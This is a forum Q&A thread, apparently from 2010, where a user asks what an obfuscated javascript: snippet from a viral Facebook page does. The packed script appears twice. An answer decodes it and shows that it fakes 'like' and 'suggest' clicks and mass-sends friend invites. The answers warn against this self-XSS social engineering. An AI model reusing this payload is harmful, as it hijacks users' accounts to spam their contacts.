I saw this page growing in popularity among my social circles on Facebook, what 98 percent bla bla... and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript.
Simply put, what does this do?
javascript:(function(){
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
eval(function(p,a,c,k,e,r){
e=function(c){
return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
;
if(!''.replace(/^/,String)){
while(c--)r[e(c)]=k[c]||e(c);
k=[function(e){
return r[e]}
];
e=function(){
return'\\w+'}
;
c=1}
;
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
d=U;
d[e[2]](V)[e[1]][e[0]]=e[3];
d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);
m=d[e[2]](e[7]);
c=d[e[9]](e[8]);
c[e[11]](e[10],I,I);
s[e[12]](c);
C(D(){
W[e[13]]()}
,E);
C(D(){
X[e[16]](e[14],e[15])}
,E);
C(D(){
m[e[12]](c);
d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
,E);
',62,69,'||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|'.split('|'),0,{
}
))})();
I saw this page growing in popularity among my social circles on Facebook, what 98 percent bla bla... and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript.
Simply put, what does this do?
javascript:(function(){
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
eval(function(p,a,c,k,e,r){
e=function(c){
return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
;
if(!''.replace(/^/,String)){
while(c--)r[e(c)]=k[c]||e(c);
k=[function(e){
return r[e]}
];
e=function(){
return'\\w+'}
;
c=1}
;
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
d=U;
d[e[2]](V)[e[1]][e[0]]=e[3];
d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);
m=d[e[2]](e[7]);
c=d[e[9]](e[8]);
c[e[11]](e[10],I,I);
s[e[12]](c);
C(D(){
W[e[13]]()}
,E);
C(D(){
X[e[16]](e[14],e[15])}
,E);
C(D(){
m[e[12]](c);
d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
,E);
',62,69,'||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|'.split('|'),0,{
}
))})();
- 2 I'm sure if you pasted it in your address bar you'd find out. I'd rather not do that. – ghoppe Commented Apr 28, 2010 at 16:34
- Thank you for editing this :D Seeing 'dose' all over the place was driving me crazy. – ChronoPositron Commented Apr 28, 2010 at 16:37
3 Answers
Reset to default 9I don't know so many are downvoting this. You are absolutely right to be suspicious about packed and otherwise-obfuscated scripts, especially with the rash of malvertisements affecting FB apps at the moment.
The first trick is to replace the eval on the results of the unpacker with an alert so you can see the code instead of executing it. That gives you something you can easily (but boringly) manually decode to:
document.getElementById('app120668947950042_mwrapper').style.visibility='hidden';
document.getElementById('app120668947950042_jop').innerHTML=document.getElementById('app120668947950042_jode').value;
s=document.getElementById('suggest');
m=document.getElementById('likeme');
c=document.createEvent('MouseEvents');
c.initEvent('click',true,true);
s.dispatchEvent(c);
setTimeout(function(){
fs.select_all()
}, 5000);
setTimeout(function(){
SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function(){
m.dispatchEvent(c);
document.getElementById('app120668947950042_ifo').innerHTML=document.getElementById('app120668947950042_ifc').value
}, 5000);
That looks like it's faking click on the ‘like’ and ‘suggest’ buttons (and subsequent dialogue), circumventing the normal controls FB require to interact with the site.
I'd report this page to FB.
In general, anything that asks you to enter a JavaScript URL is up to no good. This is the poor-man's-XSS. By allowing someone's code onto a page through a JS URL you are trusting them to do anything they want with your use of the site, as this crude social-engineering attempt demonstrates. It's depressing if a lot of people are falling for this. Maybe it's time for browsers to disallow typing javascript: URLs in the address bar.
Curse you Netscape for inventing the ugly javascript: not-really-a-URL hack and the thousands of security holes that have resulted from it!
At first glance, it looks like a packing function, used to press code into a string. Think of it like gzip pression.
That looks like the code invite your friends to join a group or something along those lines..
They've been floating around facebook for a while.